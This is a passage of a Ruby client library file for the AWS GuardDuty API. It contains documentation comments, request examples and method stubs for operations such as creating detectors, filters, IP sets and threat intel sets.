# The maximum number of seconds to delay between retries (0 for no limit)
# used by the default backoff function. This option is only used in the
# `legacy` retry mode.
#
# @option options [String] :retry_mode ("legacy")
# Specifies which retry algorithm to use. Values are:
#
# * `legacy` - The pre-existing retry behavior. This is default value if
# no retry mode is provided.
#
# * `standard` - A standardized set of retry rules across the AWS SDKs.
# This includes support for retry quotas, which limit the number of
# unsuccessful retries a client can make.
#
# * `adaptive` - An experimental retry mode that includes all the
# functionality of `standard` mode along with automatic client side
# throttling. This is a provisional mode that may change behavior
# in the future.
#
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before raising a
# `Timeout::Error`.
#
# @option options [Integer] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set per-request on the session.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idle before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the the
# system default will be used if available.
#
def initialize(*args)
super
end
# @!group API Operations
# Accepts the invitation to be monitored by a master GuardDuty account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty member account.
#
# @option params [required, String] :master_id
# The account ID of the master GuardDuty account whose invitation
# you're accepting.
#
# @option params [required, String] :invitation_id
# The value that is used to validate the master account to the member
# account.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.accept_invitation({
# detector_id: "DetectorId", # required
# master_id: "String", # required
# invitation_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/AcceptInvitation AWS API Documentation
#
# @overload accept_invitation(params = {})
# @param [Hash] params ({})
def accept_invitation(params = {}, options = {})
req = build_request(:accept_invitation, params)
req.send_request(options)
end
# Archives GuardDuty findings that are specified by the list of finding
# IDs.
#
# <note markdown="1"> Only the master account can archive findings. Member accounts don't
# have permission to archive findings from their accounts.
#
# </note>
#
# @option params [required, String] :detector_id
# The ID of the detector that specifies the GuardDuty service whose
# findings you want to archive.
#
# @option params [required, Array<String>] :finding_ids
# The IDs of the findings that you want to archive.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.archive_findings({
# detector_id: "DetectorId", # required
# finding_ids: ["FindingId"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ArchiveFindings AWS API Documentation
#
# @overload archive_findings(params = {})
# @param [Hash] params ({})
def archive_findings(params = {}, options = {})
req = build_request(:archive_findings, params)
req.send_request(options)
end
# Creates a single Amazon GuardDuty detector. A detector is a resource
# that represents the GuardDuty service. To start using GuardDuty, you
# must create a detector in each Region where you enable the service.
# You can have only one detector per account per Region.
#
# @option params [required, Boolean] :enable
# A Boolean value that specifies whether the detector is to be enabled.
#
# @option params [String] :client_token
# The idempotency token for the create request.
#
# **A suitable default value is auto-generated.** You should normally
# not need to pass this option.**
#
# @option params [String] :finding_publishing_frequency
# An enum value that specifies how frequently updated findings are
# exported.
#
# @option params [Hash<String,String>] :tags
# The tags to be added to a new detector resource.
#
# @return [Types::CreateDetectorResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateDetectorResponse#detector_id #detector_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_detector({
# enable: false, # required
# client_token: "ClientToken",
# finding_publishing_frequency: "FIFTEEN_MINUTES", # accepts FIFTEEN_MINUTES, ONE_HOUR, SIX_HOURS
# tags: {
# "TagKey" => "TagValue",
# },
# })
#
# @example Response structure
#
# resp.detector_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateDetector AWS API Documentation
#
# @overload create_detector(params = {})
# @param [Hash] params ({})
def create_detector(params = {}, options = {})
req = build_request(:create_detector, params)
req.send_request(options)
end
# Creates a filter using the specified finding criteria.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account that you want
# to create a filter for.
#
# @option params [required, String] :name
# The name of the filter.
#
# @option params [String] :description
# The description of the filter.
#
# @option params [String] :action
# Specifies the action that is to be applied to the findings that match
# the filter.
#
# @option params [Integer] :rank
# Specifies the position of the filter in the list of current filters.
# Also specifies the order in which this filter is applied to the
# findings.
#
# @option params [required, Types::FindingCriteria] :finding_criteria
# Represents the criteria to be used in the filter for querying
# findings.
#
# You can only use the following attributes to query findings:
#
# * accountId
#
# * region
#
# * confidence
#
# * id
#
# * resource.accessKeyDetails.accessKeyId
#
# * resource.accessKeyDetails.principalId
#
# * resource.accessKeyDetails.userName
#
# * resource.accessKeyDetails.userType
#
# * resource.instanceDetails.iamInstanceProfile.id
#
# * resource.instanceDetails.imageId
#
# * resource.instanceDetails.instanceId
#
# * resource.instanceDetails.outpostArn
#
# * resource.instanceDetails.networkInterfaces.ipv6Addresses
#
# * resource.instanceDetails.networkInterfaces.privateIpAddresses.privateIpAddress
#
# * resource.instanceDetails.networkInterfaces.publicDnsName
#
# * resource.instanceDetails.networkInterfaces.publicIp
#
# * resource.instanceDetails.networkInterfaces.securityGroups.groupId
#
# * resource.instanceDetails.networkInterfaces.securityGroups.groupName
#
# * resource.instanceDetails.networkInterfaces.subnetId
#
# * resource.instanceDetails.networkInterfaces.vpcId
#
# * resource.instanceDetails.tags.key
#
# * resource.instanceDetails.tags.value
#
# * resource.resourceType
#
# * service.action.actionType
#
# * service.action.awsApiCallAction.api
#
# * service.action.awsApiCallAction.callerType
#
# * service.action.awsApiCallAction.remoteIpDetails.city.cityName
#
# * service.action.awsApiCallAction.remoteIpDetails.country.countryName
#
# * service.action.awsApiCallAction.remoteIpDetails.ipAddressV4
#
# * service.action.awsApiCallAction.remoteIpDetails.organization.asn
#
# * service.action.awsApiCallAction.remoteIpDetails.organization.asnOrg
#
# * service.action.awsApiCallAction.serviceName
#
# * service.action.dnsRequestAction.domain
#
# * service.action.networkConnectionAction.blocked
#
# * service.action.networkConnectionAction.connectionDirection
#
# * service.action.networkConnectionAction.localPortDetails.port
#
# * service.action.networkConnectionAction.protocol
#
# * service.action.networkConnectionAction.localIpDetails.ipAddressV4
#
# * service.action.networkConnectionAction.remoteIpDetails.city.cityName
#
# * service.action.networkConnectionAction.remoteIpDetails.country.countryName
#
# * service.action.networkConnectionAction.remoteIpDetails.ipAddressV4
#
# * service.action.networkConnectionAction.remoteIpDetails.organization.asn
#
# * service.action.networkConnectionAction.remoteIpDetails.organization.asnOrg
#
# * service.action.networkConnectionAction.remotePortDetails.port
#
# * service.additionalInfo.threatListName
#
# * service.archived
#
# When this attribute is set to TRUE, only archived findings are
# listed. When it's set to FALSE, only unarchived findings are
# listed. When this attribute is not set, all existing findings are
# listed.
#
# * service.resourceRole
#
# * severity
#
# * type
#
# * updatedAt
#
# Type: ISO 8601 string format: YYYY-MM-DDTHH:MM:SS.SSSZ or
# YYYY-MM-DDTHH:MM:SSZ depending on whether the value contains
# milliseconds.
#
# @option params [String] :client_token
# The idempotency token for the create request.
#
# **A suitable default value is auto-generated.** You should normally
# not need to pass this option.**
#
# @option params [Hash<String,String>] :tags
# The tags to be added to a new filter resource.
#
# @return [Types::CreateFilterResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateFilterResponse#name #name} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_filter({
# detector_id: "DetectorId", # required
# name: "FilterName", # required
# description: "FilterDescription",
# action: "NOOP", # accepts NOOP, ARCHIVE
# rank: 1,
# finding_criteria: { # required
# criterion: {
# "String" => {
# eq: ["String"],
# neq: ["String"],
# gt: 1,
# gte: 1,
# lt: 1,
# lte: 1,
# equals: ["String"],
# not_equals: ["String"],
# greater_than: 1,
# greater_than_or_equal: 1,
# less_than: 1,
# less_than_or_equal: 1,
# },
# },
# },
# client_token: "ClientToken",
# tags: {
# "TagKey" => "TagValue",
# },
# })
#
# @example Response structure
#
# resp.name #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateFilter AWS API Documentation
#
# @overload create_filter(params = {})
# @param [Hash] params ({})
def create_filter(params = {}, options = {})
req = build_request(:create_filter, params)
req.send_request(options)
end
# Creates a new IPSet, which is called a trusted IP list in the console
# user interface. An IPSet is a list of IP addresses that are trusted
# for secure communication with AWS infrastructure and applications.
# GuardDuty doesn't generate findings for IP addresses that are
# included in IPSets. Only users from the master account can use this
# operation.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account that you want
# to create an IPSet for.
#
# @option params [required, String] :name
# The user-friendly name to identify the IPSet.
#
# Allowed characters are alphanumerics, spaces, hyphens (-), and
# underscores (\_).
#
# @option params [required, String] :format
# The format of the file that contains the IPSet.
#
# @option params [required, String] :location
# The URI of the file that contains the IPSet. For example:
# https://s3.us-west-2.amazonaws.com/my-bucket/my-object-key.
#
# @option params [required, Boolean] :activate
# A Boolean value that indicates whether GuardDuty is to start using the
# uploaded IPSet.
#
# @option params [String] :client_token
# The idempotency token for the create request.
#
# **A suitable default value is auto-generated.** You should normally
# not need to pass this option.**
#
# @option params [Hash<String,String>] :tags
# The tags to be added to a new IP set resource.
#
# @return [Types::CreateIPSetResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateIPSetResponse#ip_set_id #ip_set_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_ip_set({
# detector_id: "DetectorId", # required
# name: "Name", # required
# format: "TXT", # required, accepts TXT, STIX, OTX_CSV, ALIEN_VAULT, PROOF_POINT, FIRE_EYE
# location: "Location", # required
# activate: false, # required
# client_token: "ClientToken",
# tags: {
# "TagKey" => "TagValue",
# },
# })
#
# @example Response structure
#
# resp.ip_set_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateIPSet AWS API Documentation
#
# @overload create_ip_set(params = {})
# @param [Hash] params ({})
def create_ip_set(params = {}, options = {})
req = build_request(:create_ip_set, params)
req.send_request(options)
end
# Creates member accounts of the current AWS account by specifying a
# list of AWS account IDs. The current AWS account can then invite these
# members to manage GuardDuty in their accounts.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account that you want
# to associate member accounts with.
#
# @option params [required, Array<Types::AccountDetail>] :account_details
# A list of account ID and email address pairs of the accounts that you
# want to associate with the master GuardDuty account.
#
# @return [Types::CreateMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.create_members({
# detector_id: "DetectorId", # required
# account_details: [ # required
# {
# account_id: "AccountId", # required
# email: "Email", # required
# },
# ],
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateMembers AWS API Documentation
#
# @overload create_members(params = {})
# @param [Hash] params ({})
def create_members(params = {}, options = {})
req = build_request(:create_members, params)
req.send_request(options)
end
# Creates a publishing destination to export findings to. The resource
# to export findings to must exist before you use this operation.
#
# @option params [required, String] :detector_id
# The ID of the GuardDuty detector associated with the publishing
# destination.
#
# @option params [required, String] :destination_type
# The type of resource for the publishing destination. Currently only
# Amazon S3 buckets are supported.
#
# @option params [required, Types::DestinationProperties] :destination_properties
# The properties of the publishing destination, including the ARNs for
# the destination and the KMS key used for encryption.
#
# @option params [String] :client_token
# The idempotency token for the request.
#
# **A suitable default value is auto-generated.** You should normally
# not need to pass this option.**
#
# @return [Types::CreatePublishingDestinationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreatePublishingDestinationResponse#destination_id #destination_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_publishing_destination({
# detector_id: "DetectorId", # required
# destination_type: "S3", # required, accepts S3
# destination_properties: { # required
# destination_arn: "String",
# kms_key_arn: "String",
# },
# client_token: "ClientToken",
# })
#
# @example Response structure
#
# resp.destination_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreatePublishingDestination AWS API Documentation
#
# @overload create_publishing_destination(params = {})
# @param [Hash] params ({})
def create_publishing_destination(params = {}, options = {})
req = build_request(:create_publishing_destination, params)
req.send_request(options)
end
# Generates example findings of types specified by the list of finding
# types. If 'NULL' is specified for `findingTypes`, the API generates
# example findings of all supported finding types.
#
# @option params [required, String] :detector_id
# The ID of the detector to create sample findings for.
#
# @option params [Array<String>] :finding_types
# The types of sample findings to generate.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.create_sample_findings({
# detector_id: "DetectorId", # required
# finding_types: ["FindingType"],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateSampleFindings AWS API Documentation
#
# @overload create_sample_findings(params = {})
# @param [Hash] params ({})
def create_sample_findings(params = {}, options = {})
req = build_request(:create_sample_findings, params)
req.send_request(options)
end
# Creates a new ThreatIntelSet. ThreatIntelSets consist of known
# malicious IP addresses. GuardDuty generates findings based on
# ThreatIntelSets. Only users of the master account can use this
# operation.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account that you want
# to create a threatIntelSet for.
#
# @option params [required, String] :name
# A user-friendly ThreatIntelSet name displayed in all findings that are
# generated by activity that involves IP addresses included in this
# ThreatIntelSet.
#
# @option params [required, String] :format
# The format of the file that contains the ThreatIntelSet.
#
# @option params [required, String] :location
# The URI of the file that contains the ThreatIntelSet. For example:
# https://s3.us-west-2.amazonaws.com/my-bucket/my-object-key.
#
# @option params [required, Boolean] :activate
# A Boolean value that indicates whether GuardDuty is to start using the
# uploaded ThreatIntelSet.
#
# @option params [String] :client_token
# The idempotency token for the create request.
#
# **A suitable default value is auto-generated.** You should normally
# not need to pass this option.**
#
# @option params [Hash<String,String>] :tags
# The tags to be added to a new threat list resource.
#
# @return [Types::CreateThreatIntelSetResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateThreatIntelSetResponse#threat_intel_set_id #threat_intel_set_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.create_threat_intel_set({
# detector_id: "DetectorId", # required
# name: "Name", # required
# format: "TXT", # required, accepts TXT, STIX, OTX_CSV, ALIEN_VAULT, PROOF_POINT, FIRE_EYE
# location: "Location", # required
# activate: false, # required
# client_token: "ClientToken",
# tags: {
# "TagKey" => "TagValue",
# },
# })
#
# @example Response structure
#
# resp.threat_intel_set_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/CreateThreatIntelSet AWS API Documentation
#
# @overload create_threat_intel_set(params = {})
# @param [Hash] params ({})
def create_threat_intel_set(params = {}, options = {})
req = build_request(:create_threat_intel_set, params)
req.send_request(options)
end
# Declines invitations sent to the current member account by AWS
# accounts specified by their account IDs.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the AWS accounts that sent invitations to the
# current member account that you want to decline invitations from.
#
# @return [Types::DeclineInvitationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeclineInvitationsResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.decline_invitations({
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeclineInvitations AWS API Documentation
#
# @overload decline_invitations(params = {})
# @param [Hash] params ({})
def decline_invitations(params = {}, options = {})
req = build_request(:decline_invitations, params)
req.send_request(options)
end
# Deletes an Amazon GuardDuty detector that is specified by the detector
# ID.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that you want to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_detector({
# detector_id: "DetectorId", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteDetector AWS API Documentation
#
# @overload delete_detector(params = {})
# @param [Hash] params ({})
def delete_detector(params = {}, options = {})
req = build_request(:delete_detector, params)
req.send_request(options)
end
# Deletes the filter specified by the filter name.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the filter is associated with.
#
# @option params [required, String] :filter_name
# The name of the filter that you want to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_filter({
# detector_id: "DetectorId", # required
# filter_name: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteFilter AWS API Documentation
#
# @overload delete_filter(params = {})
# @param [Hash] params ({})
def delete_filter(params = {}, options = {})
req = build_request(:delete_filter, params)
req.send_request(options)
end
# Deletes the IPSet specified by the `ipSetId`. IPSets are called
# trusted IP lists in the console user interface.
#
# @option params [required, String] :detector_id
# The unique ID of the detector associated with the IPSet.
#
# @option params [required, String] :ip_set_id
# The unique ID of the IPSet to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_ip_set({
# detector_id: "DetectorId", # required
# ip_set_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteIPSet AWS API Documentation
#
# @overload delete_ip_set(params = {})
# @param [Hash] params ({})
def delete_ip_set(params = {}, options = {})
req = build_request(:delete_ip_set, params)
req.send_request(options)
end
# Deletes invitations sent to the current member account by AWS accounts
# specified by their account IDs.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the AWS accounts that sent invitations to the
# current member account that you want to delete invitations from.
#
# @return [Types::DeleteInvitationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteInvitationsResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.delete_invitations({
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteInvitations AWS API Documentation
#
# @overload delete_invitations(params = {})
# @param [Hash] params ({})
def delete_invitations(params = {}, options = {})
req = build_request(:delete_invitations, params)
req.send_request(options)
end
# Deletes GuardDuty member accounts (to the current GuardDuty master
# account) specified by the account IDs.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account whose members
# you want to delete.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the GuardDuty member accounts that you want
# to delete.
#
# @return [Types::DeleteMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeleteMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.delete_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteMembers AWS API Documentation
#
# @overload delete_members(params = {})
# @param [Hash] params ({})
def delete_members(params = {}, options = {})
req = build_request(:delete_members, params)
req.send_request(options)
end
# Deletes the publishing definition with the specified `destinationId`.
#
# @option params [required, String] :detector_id
# The unique ID of the detector associated with the publishing
# destination to delete.
#
# @option params [required, String] :destination_id
# The ID of the publishing destination to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_publishing_destination({
# detector_id: "DetectorId", # required
# destination_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeletePublishingDestination AWS API Documentation
#
# @overload delete_publishing_destination(params = {})
# @param [Hash] params ({})
def delete_publishing_destination(params = {}, options = {})
req = build_request(:delete_publishing_destination, params)
req.send_request(options)
end
# Deletes the ThreatIntelSet specified by the ThreatIntelSet ID.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the threatIntelSet is associated
# with.
#
# @option params [required, String] :threat_intel_set_id
# The unique ID of the threatIntelSet that you want to delete.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.delete_threat_intel_set({
# detector_id: "DetectorId", # required
# threat_intel_set_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DeleteThreatIntelSet AWS API Documentation
#
# @overload delete_threat_intel_set(params = {})
# @param [Hash] params ({})
def delete_threat_intel_set(params = {}, options = {})
req = build_request(:delete_threat_intel_set, params)
req.send_request(options)
end
# Returns information about the account selected as the delegated
# administrator for GuardDuty.
#
# @option params [required, String] :detector_id
# The ID of the detector to retrieve information about the delegated
# administrator from.
#
# @return [Types::DescribeOrganizationConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeOrganizationConfigurationResponse#auto_enable #auto_enable} => Boolean
# * {Types::DescribeOrganizationConfigurationResponse#member_account_limit_reached #member_account_limit_reached} => Boolean
#
# @example Request syntax with placeholder values
#
# resp = client.describe_organization_configuration({
# detector_id: "DetectorId", # required
# })
#
# @example Response structure
#
# resp.auto_enable #=> Boolean
# resp.member_account_limit_reached #=> Boolean
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DescribeOrganizationConfiguration AWS API Documentation
#
# @overload describe_organization_configuration(params = {})
# @param [Hash] params ({})
def describe_organization_configuration(params = {}, options = {})
req = build_request(:describe_organization_configuration, params)
req.send_request(options)
end
# Returns information about the publishing destination specified by the
# provided `destinationId`.
#
# @option params [required, String] :detector_id
# The unique ID of the detector associated with the publishing
# destination to retrieve.
#
# @option params [required, String] :destination_id
# The ID of the publishing destination to retrieve.
#
# @return [Types::DescribePublishingDestinationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribePublishingDestinationResponse#destination_id #destination_id} => String
# * {Types::DescribePublishingDestinationResponse#destination_type #destination_type} => String
# * {Types::DescribePublishingDestinationResponse#status #status} => String
# * {Types::DescribePublishingDestinationResponse#publishing_failure_start_timestamp #publishing_failure_start_timestamp} => Integer
# * {Types::DescribePublishingDestinationResponse#destination_properties #destination_properties} => Types::DestinationProperties
#
# @example Request syntax with placeholder values
#
# resp = client.describe_publishing_destination({
# detector_id: "DetectorId", # required
# destination_id: "String", # required
# })
#
# @example Response structure
#
# resp.destination_id #=> String
# resp.destination_type #=> String, one of "S3"
# resp.status #=> String, one of "PENDING_VERIFICATION", "PUBLISHING", "UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY", "STOPPED"
# resp.publishing_failure_start_timestamp #=> Integer
# resp.destination_properties.destination_arn #=> String
# resp.destination_properties.kms_key_arn #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DescribePublishingDestination AWS API Documentation
#
# @overload describe_publishing_destination(params = {})
# @param [Hash] params ({})
def describe_publishing_destination(params = {}, options = {})
req = build_request(:describe_publishing_destination, params)
req.send_request(options)
end
# Disables an AWS account within the Organization as the GuardDuty
# delegated administrator.
#
# @option params [required, String] :admin_account_id
# The AWS Account ID for the organizations account to be disabled as a
# GuardDuty delegated administrator.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.disable_organization_admin_account({
# admin_account_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DisableOrganizationAdminAccount AWS API Documentation
#
# @overload disable_organization_admin_account(params = {})
# @param [Hash] params ({})
def disable_organization_admin_account(params = {}, options = {})
req = build_request(:disable_organization_admin_account, params)
req.send_request(options)
end
# Disassociates the current GuardDuty member account from its master
# account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty member account.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.disassociate_from_master_account({
# detector_id: "DetectorId", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DisassociateFromMasterAccount AWS API Documentation
#
# @overload disassociate_from_master_account(params = {})
# @param [Hash] params ({})
def disassociate_from_master_account(params = {}, options = {})
req = build_request(:disassociate_from_master_account, params)
req.send_request(options)
end
# Disassociates GuardDuty member accounts (to the current GuardDuty
# master account) specified by the account IDs.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account whose members
# you want to disassociate from the master account.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the GuardDuty member accounts that you want
# to disassociate from the master account.
#
# @return [Types::DisassociateMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DisassociateMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.disassociate_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/DisassociateMembers AWS API Documentation
#
# @overload disassociate_members(params = {})
# @param [Hash] params ({})
def disassociate_members(params = {}, options = {})
req = build_request(:disassociate_members, params)
req.send_request(options)
end
# Enables an AWS account within the organization as the GuardDuty
# delegated administrator.
#
# @option params [required, String] :admin_account_id
# The AWS Account ID for the organization account to be enabled as a
# GuardDuty delegated administrator.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.enable_organization_admin_account({
# admin_account_id: "String", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/EnableOrganizationAdminAccount AWS API Documentation
#
# @overload enable_organization_admin_account(params = {})
# @param [Hash] params ({})
def enable_organization_admin_account(params = {}, options = {})
req = build_request(:enable_organization_admin_account, params)
req.send_request(options)
end
# Retrieves an Amazon GuardDuty detector specified by the detectorId.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that you want to get.
#
# @return [Types::GetDetectorResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetDetectorResponse#created_at #created_at} => String
# * {Types::GetDetectorResponse#finding_publishing_frequency #finding_publishing_frequency} => String
# * {Types::GetDetectorResponse#service_role #service_role} => String
# * {Types::GetDetectorResponse#status #status} => String
# * {Types::GetDetectorResponse#updated_at #updated_at} => String
# * {Types::GetDetectorResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.get_detector({
# detector_id: "DetectorId", # required
# })
#
# @example Response structure
#
# resp.created_at #=> String
# resp.finding_publishing_frequency #=> String, one of "FIFTEEN_MINUTES", "ONE_HOUR", "SIX_HOURS"
# resp.service_role #=> String
# resp.status #=> String, one of "ENABLED", "DISABLED"
# resp.updated_at #=> String
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetDetector AWS API Documentation
#
# @overload get_detector(params = {})
# @param [Hash] params ({})
def get_detector(params = {}, options = {})
req = build_request(:get_detector, params)
req.send_request(options)
end
# Returns the details of the filter specified by the filter name.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the filter is associated with.
#
# @option params [required, String] :filter_name
# The name of the filter you want to get.
#
# @return [Types::GetFilterResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetFilterResponse#name #name} => String
# * {Types::GetFilterResponse#description #description} => String
# * {Types::GetFilterResponse#action #action} => String
# * {Types::GetFilterResponse#rank #rank} => Integer
# * {Types::GetFilterResponse#finding_criteria #finding_criteria} => Types::FindingCriteria
# * {Types::GetFilterResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
